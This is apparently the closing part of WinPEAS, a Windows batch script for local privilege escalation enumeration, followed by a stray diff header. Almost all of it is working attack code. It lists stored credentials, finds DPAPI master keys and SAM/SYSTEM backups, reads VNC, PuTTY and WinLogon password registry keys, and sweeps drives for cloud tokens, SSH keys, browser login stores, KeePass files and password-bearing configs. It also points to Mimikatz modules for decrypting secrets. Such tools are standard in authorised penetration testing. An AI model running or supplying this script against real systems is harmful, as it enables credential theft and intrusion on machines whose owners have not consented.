 CALL :ColorLine " %E%33m[+]%E%97m WINDOWS VAULT"
 ECHO.   [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#windows-vault
 cmdkey /list
 ECHO.
 CALL :T_Progress 2
 :DPAPIMasterKeys
 CALL :ColorLine " %E%33m[+]%E%97m DPAPI MASTER KEYS"
 ECHO.   [i] Use the Mimikatz 'dpapi::masterkey' module with appropriate arguments (/rpc) to decrypt
 ECHO.   [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dpapi
 powershell -command "Get-ChildItem %appdata%\Microsoft\Protect" 2>nul
 powershell -command "Get-ChildItem %localappdata%\Microsoft\Protect" 2>nul
 CALL :T_Progress 2
 CALL :ColorLine " %E%33m[+]%E%97m DPAPI MASTER KEYS"
 ECHO.   [i] Use the Mimikatz 'dpapi::cred' module with appropriate /masterkey to decrypt
 ECHO.   [i] You can also extract many DPAPI masterkeys from memory with the Mimikatz 'sekurlsa::dpapi' module
 ECHO.   [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dpapi
 ECHO.
 ECHO.Looking inside %appdata%\Microsoft\Credentials\
 ECHO.
 dir /b/a %appdata%\Microsoft\Credentials\ 2>nul 
 CALL :T_Progress 2
 ECHO.
 ECHO.Looking inside %localappdata%\Microsoft\Credentials\
 ECHO.
 dir /b/a %localappdata%\Microsoft\Credentials\ 2>nul
 CALL :T_Progress 2
 ECHO.
 :UnattendedFiles
 CALL :ColorLine " %E%33m[+]%E%97m Unattended files"
 IF EXIST %WINDIR%\sysprep\sysprep.xml ECHO.%WINDIR%\sysprep\sysprep.xml exists. 
 IF EXIST %WINDIR%\sysprep\sysprep.inf ECHO.%WINDIR%\sysprep\sysprep.inf exists. 
 IF EXIST %WINDIR%\sysprep.inf ECHO.%WINDIR%\sysprep.inf exists. 
 IF EXIST %WINDIR%\Panther\Unattended.xml ECHO.%WINDIR%\Panther\Unattended.xml exists. 
 IF EXIST %WINDIR%\Panther\Unattend.xml ECHO.%WINDIR%\Panther\Unattend.xml exists. 
 IF EXIST %WINDIR%\Panther\Unattend\Unattend.xml ECHO.%WINDIR%\Panther\Unattend\Unattend.xml exists. 
 IF EXIST %WINDIR%\Panther\Unattend\Unattended.xml ECHO.%WINDIR%\Panther\Unattend\Unattended.xml exists.
 IF EXIST %WINDIR%\System32\Sysprep\unattend.xml ECHO.%WINDIR%\System32\Sysprep\unattend.xml exists.
 IF EXIST %WINDIR%\System32\Sysprep\unattended.xml ECHO.%WINDIR%\System32\Sysprep\unattended.xml exists.
 IF EXIST %WINDIR%\..\unattend.txt ECHO.%WINDIR%\..\unattend.txt exists.
 IF EXIST %WINDIR%\..\unattend.inf ECHO.%WINDIR%\..\unattend.inf exists. 
 ECHO.
 CALL :T_Progress 2
 :SAMSYSBackups
 CALL :ColorLine " %E%33m[+]%E%97m SAM and SYSTEM backups"
 IF EXIST %WINDIR%\repair\SAM ECHO.%WINDIR%\repair\SAM exists. 
 IF EXIST %WINDIR%\System32\config\RegBack\SAM ECHO.%WINDIR%\System32\config\RegBack\SAM exists.
 IF EXIST %WINDIR%\System32\config\SAM ECHO.%WINDIR%\System32\config\SAM exists.
 IF EXIST %WINDIR%\repair\SYSTEM ECHO.%WINDIR%\repair\SYSTEM exists.
 IF EXIST %WINDIR%\System32\config\SYSTEM ECHO.%WINDIR%\System32\config\SYSTEM exists.
 IF EXIST %WINDIR%\System32\config\RegBack\SYSTEM ECHO.%WINDIR%\System32\config\RegBack\SYSTEM exists.
 ECHO.
 CALL :T_Progress 3
 :McAffeeSitelist
 CALL :ColorLine " %E%33m[+]%E%97m McAffee SiteList.xml"
 cd %ProgramFiles% 2>nul
 dir /s SiteList.xml 2>nul
 cd %ProgramFiles(x86)% 2>nul
 dir /s SiteList.xml 2>nul
 cd "%windir%\..\Documents and Settings" 2>nul
 dir /s SiteList.xml 2>nul
 cd %windir%\..\Users 2>nul
 dir /s SiteList.xml 2>nul
 ECHO.
 CALL :T_Progress 2
 :GPPPassword
 CALL :ColorLine " %E%33m[+]%E%97m GPP Password"
 cd "%SystemDrive%\Microsoft\Group Policy\history" 2>nul
 dir /s/b Groups.xml == Services.xml == Scheduledtasks.xml == DataSources.xml == Printers.xml == Drives.xml 2>nul
 cd "%windir%\..\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history" 2>nul
 dir /s/b Groups.xml == Services.xml == Scheduledtasks.xml == DataSources.xml == Printers.xml == Drives.xml 2>nul
 ECHO.
 CALL :T_Progress 2
 :CloudCreds
 CALL :ColorLine " %E%33m[+]%E%97m Cloud Credentials"
 cd "%SystemDrive%\Users"
 dir /s/b .aws == credentials == gcloud == credentials.db == legacy_credentials == access_tokens.db == .azure == accessTokens.json == azureProfile.json 2>nul
 cd "%windir%\..\Documents and Settings"
 dir /s/b .aws == credentials == gcloud == credentials.db == legacy_credentials == access_tokens.db == .azure == accessTokens.json == azureProfile.json 2>nul
 ECHO.
 CALL :T_Progress 2
 :AppCMD
 CALL :ColorLine " %E%33m[+]%E%97m AppCmd"
 ECHO.   [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#appcmd-exe
 IF EXIST %systemroot%\system32\inetsrv\appcmd.exe ECHO.%systemroot%\system32\inetsrv\appcmd.exe exists. 
 ECHO.
 CALL :T_Progress 2
 :RegFilesCredentials
 CALL :ColorLine " %E%33m[+]%E%97m Files in registry that may contain credentials"
 ECHO.   [i] Searching specific files that may contains credentials.
 ECHO.   [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files
 ECHO.Looking inside HKCU\Software\ORL\WinVNC3\Password
 reg query HKCU\Software\ORL\WinVNC3\Password 2>nul
 CALL :T_Progress 2
 ECHO.Looking inside HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4/password
 reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password 2>nul
 CALL :T_Progress 2
 ECHO.Looking inside HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\WinLogon
 reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername"
 CALL :T_Progress 2
 ECHO.Looking inside HKLM\SYSTEM\CurrentControlSet\Services\SNMP
 reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s 2>nul
 CALL :T_Progress 2
 ECHO.Looking inside HKCU\Software\TightVNC\Server
 reg query HKCU\Software\TightVNC\Server 2>nul
 CALL :T_Progress 2
 ECHO.Looking inside HKCU\Software\SimonTatham\PuTTY\Sessions
 reg query HKCU\Software\SimonTatham\PuTTY\Sessions /s 2>nul
 CALL :T_Progress 2
 ECHO.Looking inside HKCU\Software\OpenSSH\Agent\Keys
 CALL :T_Progress 2
 reg query HKCU\Software\OpenSSH\Agent\Keys /s 2>nul
 cd %USERPROFILE% 2>nul && dir /s/b *password* == *credential* 2>nul
 cd ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..
 dir /s/b /A:-D RDCMan.settings == *.rdg == SCClient.exe == *_history == .sudo_as_admin_successful == .profile == *bashrc == httpd.conf == *.plan == .htpasswd == .git-credentials == *.rhosts == hosts.equiv == Dockerfile == docker-compose.yml == appcmd.exe == TypedURLs == TypedURLsTime == History == Bookmarks == Cookies == "Login Data" == places.sqlite == key3.db == key4.db == credentials == credentials.db == access_tokens.db == accessTokens.json == legacy_credentials == azureProfile.json == unattend.txt == access.log == error.log == *.gpg == *.pgp == *config*.php == elasticsearch.y*ml == kibana.y*ml == *.p12 == *.der == *.csr == *.cer == known_hosts == id_rsa == id_dsa == *.ovpn == anaconda-ks.cfg == hostapd.conf == rsyncd.conf == cesi.conf == supervisord.conf == tomcat-users.xml == *.kdbx == KeePass.config == Ntds.dit == SAM == SYSTEM == FreeSSHDservice.ini == sysprep.inf == sysprep.xml == unattend.xml == unattended.xml == *vnc*.ini == *vnc*.c*nf* == *vnc*.txt == *vnc*.xml == groups.xml == services.xml == scheduledtasks.xml == printers.xml == drives.xml == datasources.xml == php.ini == https.conf == https-xampp.conf == httpd.conf == my.ini == my.cnf == access.log == error.log == server.xml == SiteList.xml == ConsoleHost_history.txt == setupinfo == setupinfo.bak 2>nul | findstr /v ".dll"
 cd inetpub 2>nul && (dir /s/b web.config == *.log & cd ..)
 ECHO.
 CALL :T_Progress 2
 :ExtendedDriveScan
 if "%long%" == "true" (
    CALL :ColorLine " %E%33m[+]%E%97m REGISTRY WITH STRING pass OR pwd"
 	reg query HKLM /f passw /t REG_SZ /s
 	reg query HKCU /f passw /t REG_SZ /s
 	reg query HKLM /f pwd /t REG_SZ /s
 	reg query HKCU /f pwd /t REG_SZ /s
 	ECHO.
 	ECHO.   [i] Iterating through the drives
 	ECHO.
 	for /f %%x in ('wmic logicaldisk get name^| more') do (
 		set tdrive=%%x
 		if "!tdrive:~1,2!" == ":" (
 			%%x
            CALL :ColorLine " %E%33m[+]%E%97m FILES THAT CONTAINS THE WORD PASSWORD WITH EXTENSION: .xml .ini .txt *.cfg *.config"
 	        findstr /s/n/m/i password *.xml *.ini *.txt *.cfg *.config 2>nul | findstr /v /i "\\AppData\\Local \\WinSxS ApnDatabase.xml \\UEV\\InboxTemplates \\Microsoft.Windows.Cloud \\Notepad\+\+\\ vmware cortana alphabet \\7-zip\\" 2>nul
            ECHO.
            CALL :ColorLine " %E%33m[+]%E%97m FILES WHOSE NAME CONTAINS THE WORD PASS CRED or .config not inside \Windows\"
            dir /s/b *pass* == *cred* == *.config* == *.cfg 2>nul | findstr /v /i "\\windows\\"  
            ECHO.
 		)
 	)
 	CALL :T_Progress 2
 ) ELSE (
 	CALL :T_Progress 2
 )
 TITLE WinPEAS - Windows local Privilege Escalation Awesome Script - Idle
 ECHO.---
 ECHO.Scan complete.
 PAUSE >NUL 
 EXIT /B
 :::-Subroutines
 :SetOnce
 REM :: ANSI escape character is set once below - for ColorLine Subroutine
 SET "E=0x1B["
 SET "PercentageTrack=0"
 EXIT /B
 :T_Progress
 SET "Percentage=%~1"
 SET /A "PercentageTrack=PercentageTrack+Percentage"
 TITLE WinPEAS - Windows local Privilege Escalation Awesome Script - Scanning... !PercentageTrack!%%
 EXIT /B
 :ColorLine
 SET "CurrentLine=%~1"
 FOR /F "delims=" %%A IN ('FORFILES.EXE /P %~dp0 /M %~nx0 /C "CMD /C ECHO.!CurrentLine!"') DO ECHO.%%A
 EXIT /B
--- a/win/winPEAS.exe
+++ b/win/winPEAS.exe